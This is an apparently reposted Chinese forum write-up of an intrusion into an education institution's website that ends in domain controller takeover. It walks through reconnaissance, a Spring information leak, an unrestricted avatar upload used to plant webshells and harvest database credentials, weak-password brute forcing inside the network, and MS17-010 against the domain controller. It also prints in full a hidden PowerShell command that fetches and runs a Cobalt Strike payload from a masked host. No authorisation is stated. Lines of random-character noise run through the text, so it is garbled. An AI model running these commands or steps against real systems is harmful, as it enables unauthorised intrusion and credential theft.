|
( S! H+ y; C& v4 [! h7 k 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
( }6 H$ f/ ]& F' F $ i Q6 a3 }- {7 b
' T- F8 B" H+ q) ?9 v
4 u) Y6 k$ A2 H: n8 F( u
8 S5 y+ Z7 Z0 c( f2 I. D7 ~5 ]1 I3 F9 X, f5 O# w) z- i7 z/ ]- \- G
正文% B) f2 j6 J* m* w
- @" ^: ^# Q \7 ` V/ Q& T3 h
+ N0 g+ R4 O- ?0 O9 V! [3 B
: x' S, t' _* P0 W0 b3 f3 _* Q 2 Y# Y* K% R* ?$ c* A/ S' e
j2 H' p: |1 a N& U 目标:www.xxxx.com(一家教育机构)
7 p) x" O+ i! y6 Y8 B% K打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
_% x+ V. D4 m
" i. {8 T' Q. S4 u1 x: P8 c% u" t5 C
" c+ y9 }: o9 {% l k* @ ) n' W; L, I H
. a# @& t7 @: ]+ B: S+ E+ l; N
进行了简单的信息搜集
x* f) p' w9 O, v* e+ [5 F
) A" |" L" M3 A; x8 f' A, W% C
: W6 E: ^' X) Q/ ^- |
E$ d3 j! Z% X- `# I( u9 Q
% I/ t2 i) h2 }$ M* W- { 子域名搜集( d7 J% }7 @7 b$ }6 N
1 P6 Y9 M- N0 R- s
2 d. C0 N4 ^" u/ v6 I4 U" Z6 h% \  9 b2 w' |& t9 w1 h
) R% B; H# ?- k9 P; ?& c/ Q# K9 y5 s3 o
fofa找资产
1 E# B" _( [0 ~ ^& p
5 Y9 `4 n! A& r
9 z3 _! G! \$ O4 G7 j- w
+ }9 a2 \' ?' P0 }0 S$ E4 }! U" s# t5 X/ V
 . W6 g( b( T, _% H4 @6 D/ \
- k( Z! {* f4 q" ~$ m \5 Q
7 V! P5 X" P! N+ H; `- l7 E
一共七个资产。去重之后只有两个。
$ r& h' F9 j4 b8 _2 }
* [7 H4 @/ Q$ m1 A/ V$ I% m1 o1 ^2 ]3 k8 H i( ^
9 X3 s5 N- ?* a) k
9 r ^+ n) s5 e+ _ 目录探测
8 E+ }+ ~8 a$ V5 m
* s5 R! D( w5 ?1 _$ ?
" U; @9 @5 F5 ` 
+ i/ N2 D( b" V/ s
% K8 o; H- Y2 G1 q5 d: f
2 n4 C1 f4 q2 k1 n* s2 Z" O x" E& e 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
" L' Z" W" _8 |0 a+ x
8 _& Z2 [3 g5 p8 p! W- o! n8 U) l! H% F0 A, ~, D
5 _& k4 ~5 a5 V
f* k: c$ }% k6 C' ~5 F 我又尝试了通过修改返回包来绕过登录界面
% O; ?6 g- c, m# w Z% [; m' V5 ^. x
7 I7 x2 S3 {9 d9 }% g" x+ |
 $ |! b8 H3 n7 w3 O& f1 P; C' O9 [
4 P8 M. n0 V& c* A. o# S4 Z9 v
9 e9 d2 ~5 X) N, _6 P
还是不行,尝试注入无果" O; i& d0 p; n( S
U7 X+ P4 C1 e7 O! M: I- [# }' w- d& Y2 t' i! V+ J( ]
. U0 O3 N' V! s! z: \ l7 }% T
9 ]8 q$ O/ [) {8 B9 @* E+ c; T& k: c# e& p" g
不过我目录探测出了一处Spring信息泄露
+ {9 O. f1 s9 h# Q
; x+ }: z) D; D. B7 D! x$ Q1 O" v% ^7 O, B; j
0 |' b1 i* b" n5 B S
, k. Q/ o( S8 f0 U# _3 I& O7 O 
/ }2 q y/ e. {% {' ] , ^. n) Q9 y$ `: {% a: ]: Y- ?
- P) n$ u& b* B1 Q 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录0 y' I2 G; R* O$ U7 @+ r$ h- p8 n6 ?
% i& R1 g/ W# n; n5 M) ]
% l5 `" T! Q; `, \ 
3 A' }5 G5 o/ w' u5 O% ~
- O! S* S6 C, ?5 |/ S* b
1 d6 x( b$ |+ ?/ N2 E2 J9 c 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。; _0 W0 x" N! n+ S2 C6 B
. I) z1 [$ F+ J9 F" Z, _& Q6 P! q+ ^! _) l& I" b
; o6 l& V) _1 @7 A9 Q. W% ]) n % W* R, z3 g% |0 _8 Z" J
0 R& {/ p+ f6 ~ 获取有些师傅到这一步就手机抓包电脑测了。
" R9 b l6 R5 [3 o N# t5 W3 J& y3 K
! n# a0 ^. J6 S0 e
# e! o, B6 p+ M; d6 J+ \( D Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。% ]$ i! ]" o/ r: I0 q1 r
- O7 k T: V: x% H. z: o% i3 o1 v1 g+ _. p; R: u0 L; s; m
其中在一个公众号发现了小程序,可以进行注册。9 d3 U0 I9 b2 p' V2 n$ T& G
$ ~* u+ m3 |# A. N
2 T, m( o$ ?4 g4 G0 q9 e8 m 看到了头像上传,尝试上传获取WebShell* k0 ^1 A! g! y2 V' k$ u8 k" p( k( _
3 W4 s) }* `' j# H: U0 g. p, N, m
. B! X v5 t/ B9 L% ^2 c 
; e! u% D3 H- h : T8 [+ s8 p2 i
- ^" q" }, J* O8 h' _ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问9 y* q7 W& z" f N9 L* P& ~& a% ?
$ D: M z; p' m' s
2 }# B1 c" k0 J! j2 U' u  ' L# j* V4 W0 e: q. i- D
8 N) a1 h7 K/ [7 I" X
* p8 y& v' F5 V 然后上了大马& ?) Z C7 r; F' j* X
. O0 f! p- m* z7 b1 H2 y
, p: @* z5 p' e: M/ e; |  ! h( @. x1 y1 ]4 l U
8 T, |3 m1 O3 U# s( ^" F4 A9 m" a* J( ^/ u; v( ^( A' D4 B9 X5 I+ e
+ I& e* y( D* M( y
2 @* Z3 D/ [% N8 H* X
2 ]$ d- ^- O- A2 V5 P3 V( C! } 通过翻找文件发现数据库账号密码! h q: F. s3 I1 N: c- X6 c* L4 g
5 m$ c5 p0 P2 D9 ]( v9 n8 G4 O. n3 u! G2 {( I& H
) H+ }! U# ]# b4 N- h) r
2 M5 a* _, d+ n$ c# m1 H; D5 b3 r4 Q3 d) W$ w- _
--内网渗透/ e9 t5 E7 [3 i. Z( J
7 k o$ V1 N0 Z/ h
9 T+ j+ d$ k9 Y5 x$ [1 l 直接通过powershell执行 cs上线# Y( U/ c# C; p" V; ]9 U4 c
! \! b( E# n. @3 K
; k3 X' K( m( E3 R: b+ U9 i powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"/ A6 u% o8 S) s, B; ~
% z1 @0 W1 _1 B8 ^" L" Q* M+ X5 v1 Q) M8 o9 J8 {& @0 |
( g5 E( [, ~" D. t( M " O$ d! M. f. C, F
1 P2 P: x6 [$ @8 J. i: P
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
! }6 m: |# P' Z# P8 @+ n& Q 9 }" J" u2 r( ]* T$ j2 B2 O- I
8 I) J! |+ U" m. b/ Y
 9 q2 o _4 P* ~5 `5 `) m
1 N: c8 s7 K- D/ Y
W- \& H+ c& V3 D
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
/ V" [6 c' H* _
& n" _) `. ]* _' W% o p9 v
) c8 P( U4 d( i! \5 o
8 w" T4 g8 I' H2 K4 a) o 1 Q! ?. t2 v4 e: ` g/ ]9 P
& ~& W. D" s3 s8 z* g; m 
7 i v- y6 N: J" t) ~' y
" {1 t$ h9 ]' U3 {9 ^, @* C+ |
# S$ D' I8 p6 T: p: ]+ q3 R 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
) @- S) ?/ Y. k. |1 `
6 B" L K2 ~0 }% e: S
/ _7 {5 _' j' R) A/ Y
3 K; w$ c: r8 [, K$ v0 y
; _! b' V: E) }- ^0 F i/ X 
+ D3 I( I( v5 H- |- [ + C9 u3 P. Q" \+ K9 I+ R" _: m
% S7 B3 _6 [ O4 O1 U
! A. k4 H/ N& n7 b3 a
) B/ }! I6 u+ o2 b
; R' M* r3 b4 A7 C+ p: b3 b
- J3 I, T* a/ t* ~3 \: G! C
% x) _. O* E' l" D: i: e
; E- u$ p) k J
: U, U2 K" l, X8 z* m) \
* }- x; {' F* n0 Q! ?0 n 小结
0 l4 B5 q$ @$ r; q3 Y, b& P' S0 F , z1 N: n. J$ q3 |# e
. m" l* T- o' m) s8 G
2 ~& L9 Y5 X# _' s k
. ?5 w8 ]' k& a. X& m
) d4 y9 ]; K' @) S4 S: w, ~
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
; f0 a" {5 }& o1 h % ?+ q% \3 c" h5 J$ R/ x
" V3 w; z5 z# z# m1 M8 | + w6 ~; v3 \8 X
( L L3 |; u+ d6 ~& G+ ~+ h
7 Y4 }4 V7 Z, K, s9 z( \9 e" c
-
, _% W$ W8 L% {: L! l4 g& {- k , t( M2 [' X, i* b, `- O9 \) u5 I( F
5 f! t( L) z# E8 o -
3 b5 Z* N3 M% k% ?, O- A& z . ? E& I7 x) O, @
$ w, m: R3 }1 y( |2 _7 S* I
( [8 e- u+ E5 t$ T* m$ j' m
2 J9 u5 @- r" |6 z1 o8 N7 o! `' E
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html7 |; V; ~) ^ ^6 M
4 G% a, ^/ R: u
9 U' Z/ }8 ` j R$ P
7 N2 t% V$ F/ i( L1 y9 f | 
发表于 2024-3-1 19:41:32
收藏
支持
反对